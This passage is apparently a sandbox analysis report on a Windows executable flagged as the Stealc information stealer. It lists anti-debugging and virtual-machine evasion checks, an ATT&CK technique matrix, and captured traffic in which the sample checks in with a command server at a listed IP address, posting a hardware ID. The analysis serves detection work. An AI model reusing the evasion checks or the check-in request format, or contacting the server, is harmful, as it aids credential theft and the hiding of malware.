              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B21BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00B21BF0
              Source: file.exe, file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1383935885.00000000018A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.1383935885.00000000018D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25653
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25661
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25506
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25524
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25674
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25550
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B04A60 VirtualProtect 00000000,00000004,00000100,?1_2_00B04A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B26390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00B26390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B26390 mov eax, dword ptr fs:[00000030h]1_2_00B26390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B22AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00B22AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_00B246A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B24610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00B24610
              Source: file.exe, file.exe, 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: FDProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00B22D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B21B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,1_2_00B21B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B22A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00B22A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B22C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00B22C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpft100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://185.215.113.206/c4becf79229cb002.phpftfile.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://185.215.113.206file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/c4becf79229cb002.php8file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/c4becf79229cb002.phphfile.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1560054
                          Start date and time:2024-11-21 11:02:10 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 123
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: file.exe
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.945634053284836
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'789'952 bytes
                          MD5:88d9a99ca46e751ab8202680c23046f3
                          SHA1:dcba4b2d61dc2e695d2f0d6c4e4011cfd66d547f
                          SHA256:16503ad13cedbcd3a80af81e25a871ef01ca4606fa2e61f3960924fd2c000ee4
                          SHA512:0ac42f6dbabc574024472697b42d9d38c14230e69a5e434fb97e1c3c95b58d5d4fe593965812dd209b2414167662377006b1562033acf5d9b6d6bba5c7cc1ff3
                          SSDEEP:49152:N9QJ8SRmZEblDMUePc0eTM0QoEzH934Ma18:bQ2SRkE9cIwNo
                          TLSH:4D853362DC93B6A8DDB7853431763E802BA05CE07C134EC4B2D197B78AFB6256B15873
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xa8b000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007F6E38B874AAh
                          ucomiss xmm3, dqword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [edx+ecx], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          inc eax
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edx+ecx], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add al, 0Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x1620073b5bd07d4f42424cecfcc9ff0fc6e0cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x1ac0x2006744c47571063080f8eee01066a2a873False0.58203125data4.543360183803996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2a20000x200c62ad87c92c3a5276e9be62eea94a46bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          vxwrnjjb0x4ee0000x19c0000x19b2004ba297097c4b726df6b6897ea132f711False0.9949987173152934data7.9545182277365285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          aqjwqyrz0x68a0000x10000x40081d09b7bb45abc4787695b75ab803387False0.80859375data6.193376999651223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x68b0000x30000x2200c5b3d3e9c86d8c41b8d70271fd347152False0.05847886029411765DOS executable (COM)0.7422190545502548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x6890040x152ASCII text, with CRLF line terminators0.6479289940828402
                          DLLImport
                          kernel32.dlllstrcpy
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-21T11:03:20.179542+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749707185.215.113.20680TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 21, 2024 11:03:18.119792938 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:18.241224051 CET8049707185.215.113.206192.168.2.7
                          Nov 21, 2024 11:03:18.241317987 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:18.241914034 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:18.362509012 CET8049707185.215.113.206192.168.2.7
                          Nov 21, 2024 11:03:19.644452095 CET8049707185.215.113.206192.168.2.7
                          Nov 21, 2024 11:03:19.644525051 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:19.719203949 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:19.838788033 CET8049707185.215.113.206192.168.2.7
                          Nov 21, 2024 11:03:20.179471970 CET8049707185.215.113.206192.168.2.7
                          Nov 21, 2024 11:03:20.179542065 CET4970780192.168.2.7185.215.113.206
                          Nov 21, 2024 11:03:22.428448915 CET4970780192.168.2.7185.215.113.206
                          • 185.215.113.206
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.749707185.215.113.206807408C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Nov 21, 2024 11:03:18.241914034 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 21, 2024 11:03:19.644452095 CET203INHTTP/1.1 200 OK
                          Date: Thu, 21 Nov 2024 10:03:19 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 21, 2024 11:03:19.719203949 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ
                          Host: 185.215.113.206
                          Content-Length: 210
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a
                          Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="hwid"688CC387E67C932731780------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build"mars------GDBAKEGIDBGIEBFHDHJJ--
                          Nov 21, 2024 11:03:20.179471970 CET210INHTTP/1.1 200 OK
                          Date: Thu, 21 Nov 2024 10:03:19 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:1
                          Start time:05:03:13
                          Start date:21/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xb00000
                          File size:1'789'952 bytes
                          MD5 hash:88D9A99CA46E751AB8202680C23046F3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
